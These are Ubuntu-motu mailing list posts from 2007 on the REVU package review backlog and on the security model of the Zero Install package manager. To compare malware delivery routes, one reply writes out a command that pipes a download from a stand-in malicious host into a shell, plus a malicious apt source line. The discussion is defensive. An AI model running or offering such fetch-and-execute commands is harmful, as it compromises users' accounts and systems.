Re: Temporary REVU package storage
On Sat, 18 Aug 2007 11:06:09 -0400, Barry deFreese wrote: [...] Additionally, before you start demanding that I do things in the way that's easy for you, remember that I'm a volunteer. On a related note, I really don't think we need to make it easier to submit packages. I have to agree with Scott here for the most part. You have to remember that community development works both ways. It's mighty easy to throw a package up on REVU/LP/wherever and walk away. It's another thing to get it packaged properly, make sure it meets Debian/Ubuntu standards wrt to licensing, packaging, dependencies, etc. As a contributor, though, it's also hard to get your packaging done properly when the review feedback doesn't come until months after the upload. Maybe some of the people who gave up would have become good long- term maintainers if they'd had a good first experience. I know I'm guilty of this too. As an upstream author, I don't have time to look at many of the patches people send me, and I never hear from them again. Back when I was a student (and had more time!) I replied to everything and built up a good developer community. There are over 7,000 bugs filed against packages in Universe and Multiverse. Add to that hundreds of packages that possibly 1 individual thinks should be added to the archive. And this is all to be supported by a few dozen volunteer MOTUs? Many of whom have full-time RL jobs/school/wives/husbands/girlfriends/boyfriends/children, etc. Tell me how we are supposed to manage that? You can't. But, these people still need a way to distribute their programs. If someone makes a package that's only useful to 10 Ubuntu users in the whole world, then the only recommended way to get it to them is to get it into Universe. Yet, the full review process doesn't make sense for such a small audience. How about suggesting that these packagers first create a Zero Install package (http://0install.net) and maintain that on their own web-site for a while? Then MOTU could *invite* authors of desirable packages to get them into Universe, rather than having people submit everything and the reviewers being too polite to turn them away? This is similar to the development model used in the distributed version control systems: let people publish whatever they want on their own site and the 'official' maintainer pulls the bits they want. If you don't have to be accepted by MOTU to distribute packages with security, updates, dependency handling, etc then there's less pressure to get every trivial package in Universe in the first place. -- Dr Thomas Leonard http://rox.sourceforge.net GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1 -- Ubuntu-motu mailing list Ubuntu-motu@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
Re: zeroinstall-injector
On Fri, 12 Jan 2007 01:03:24 +0100, Jan Claeys wrote: Op dinsdag 09-01-2007 om 20:42 uur [tijdzone +], schreef Thomas Leonard: I think you'll find the security model is rather different in Zero Install. In particular, it should never break a user account, since it only ever writes to the directories ~/.config/0install.net and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything else ;-). Do I understand your site correctly when I think that by default it's not possible to run Zero-Installed programs directly, but that it's required to start them using the '0launch' wrapper? That's correct. You can create short-cuts to do this (0alias creates a shell script, AddApp creates a ROX app dir, Xfce's panel lets you drag links in, etc). However, it's always the user (or admin) who specifies any short-cut, not the package. -- Dr Thomas Leonard http://rox.sourceforge.net GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1 -- Ubuntu-motu mailing list Ubuntu-motu@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
Re: zeroinstall-injector
On Wed, 10 Jan 2007 20:15:08 +0100, Dennis Kaarsemaker wrote: On wo, 2007-01-10 at 18:59 +, Thomas Leonard wrote: In other words, Zero Install isn't a complete security system, but it's a necessary part of a solution. imho it's not a solution at all. We work with source and can include things in the repositories. I don't think Ubuntu should go and make non-opensource programs easier to install. I agree, Ubuntu shouldn't be making non-opensource programs easier to install. However, bringing the discussion back to Zero Install, here are some screenshots of a Zero Install user compiling a ROX applet from source: http://rox.sourceforge.net/desktop/node/360 Note the 'Publish' button in the compile window. Not only do we let users modify the source, we let them redistribute it too. Yes, even unauthorised users. Binary packages created this way automatically include information about the upstream sources used (versions, where to get them, digests) and a patch file, if the user made any changes. So, you should be able to recreate a build reliably if you want to modify it further. (it's possible to remove these, of course, just as you can create a binary-only .deb, but it's open by default) -- Dr Thomas Leonard http://rox.sourceforge.net GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1 -- Ubuntu-motu mailing list Ubuntu-motu@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
zeroinstall-injector
Hi, I uploaded a package for Zero Install back in Oct 2006: http://revu.tauware.de/details.py?upid=3885 I got a comment on Dec 20th to update the version number, which I've done. Do I need to tell someone about this (e.g. write to this list), or do reviewers get notified automatically? How long does the process normally take? Thanks, -- Dr Thomas Leonard http://rox.sourceforge.net GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1 -- Ubuntu-motu mailing list Ubuntu-motu@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
Re: zeroinstall-injector
On Tue, 09 Jan 2007 21:09:11 +0100, Reinhard Tartler wrote: Thomas Leonard [EMAIL PROTECTED] writes: I uploaded a package for Zero Install back in Oct 2006: http://revu.tauware.de/details.py?upid=3885 I got a comment on Dec 20th to update the version number, which I've done. Do I need to tell someone about this (e.g. write to this list), or do reviewers get notified automatically? How long does the process normally take? Apart from the package quality (which I'd consider okay), I had a look what 0install actually does. It seems to me that 0install is similar to autopackage, a project I have strong reservations with. I fear that this tool has to potential to badly break an user account. I think you'll find the security model is rather different in Zero Install. In particular, it should never break a user account, since it only ever writes to the directories ~/.config/0install.net and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything else ;-). Furthermore, I have some security concerns (who validates/authorizes a signature from one upstream). The user installing the software, assisted by a hints database of known keys. While you can try to protect users from installing malware, at the end of the day it *is* their computer, and they have to make the final judgement. Note that, unlike dpkg, Zero Install doesn't run any scripts as root, or copy files into /usr/bin, etc. So, from a security perspective you should compare a user installing with Zero Install vs installing to $HOME without it. What happens, if a library is pulled via 0install, and later installed via apt-get? APT will place one copy in /usr/lib, which will be used by programs installed by APT. Zero Install will place one (possibly identical) copy in ~/.cache/0install.net, which will be used by programs run through Zero Install. Having two copies may be inefficient, but nothing should break. What do the others think? Should we have this in ubuntu? Please let me know if you have any other concerns. -- Dr Thomas Leonard http://rox.sourceforge.net GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1 -- Ubuntu-motu mailing list Ubuntu-motu@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu
Re: zeroinstall-injector
On Tue, 09 Jan 2007 22:41:56 +0100, Reinhard Tartler wrote: Thomas Leonard [EMAIL PROTECTED] writes: I think you'll find the security model is rather different in Zero Install. In particular, it should never break a user account, since it only ever writes to the directories ~/.config/0install.net and ~/.cache/0install.net (which I presume Ubuntu isn't using for anything else ;-). Err, that's fair enough. My concern is rather, that code from unknown/unauthorized 3rd parties is executed, so the perfect way to inject trojan or other malware. Well, here are three possible ways to install malware: - Tell Zero Install to run http://malware.com/malware. Either ignore the warning about the key being unknown, or take the risk that the key isn't trust-worthy even if it's in the database. Result: User account compromised. - Type: $ wget malware.com/malware -O -|sh Result: User account compromised. - Edit /etc/apt/sources.list and add: deb http://malware.com/... Result: Root compromise. As a malware author, why would you use Zero Install instead of one of the other methods? The second one is available to all users and at least as effective. Plus, your victims get no warnings about keys at all that way. Note: I copied that wget example from a real web-page for some genuine software (but I changed the name ;-) - people are really forced to do this kind of thing at the moment! It really depends why someone is trying to install the software: - This game looks fun! Hmm... it's too hard to install. Let's install a different game from Ubuntu's approved repository instead! vs - I need this software to get my work done and Ubuntu doesn't have it. or - I'll keep trying until it's installed. Furthermore, I have some security concerns (who validates/authorizes a signature from one upstream). The user installing the software, assisted by a hints database of known keys. While you can try to protect users from installing malware, at the end of the day it *is* their computer, and they have to make the final judgement. Where do these 'known' keys come from? Who authorizes these keys? Currently, people post them to a public mailing list and I add them. Here's a screenshot showing a typical dialog: http://0install.net/trustbox.png If universe has stricter checks, we could use that keyring too for the hints (This key is approved by MOTU / MOTU has not approved this key - USE AT OWN RISK!). Please let me know if you have any other concerns. Well, in ubuntu, the archives key come from the installation media. I have the concern that it may seem that including 0install could imply that we 'authorize' other 3rd party software. Do Ubuntu users really need to be authorised by you to run software on their own computers? Note that there are no pre-approved keys, just information about where the key was announced. Perhaps we could make the confirmation stronger; something like what you get from apt-get remove grep? As always, there's a balance. Make it too easy to install programs and some people will install every stupid toy they see. Make the installer too strict, and people start doing wget | sh and not using it at all. I fear that we'll get bugreports from 3rd party software by users, who have installed random software via 0install, and that we will not be able to support them. That's true. How do you deal with this problem with Firefox extensions, Python distutil modules, modified sources.list files and similar? Thanks, -- Dr Thomas Leonard http://rox.sourceforge.net GPG: 9242 9807 C985 3C07 44A6 8B9A AE07 8280 59A5 3CC1 -- Ubuntu-motu mailing list Ubuntu-motu@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-motu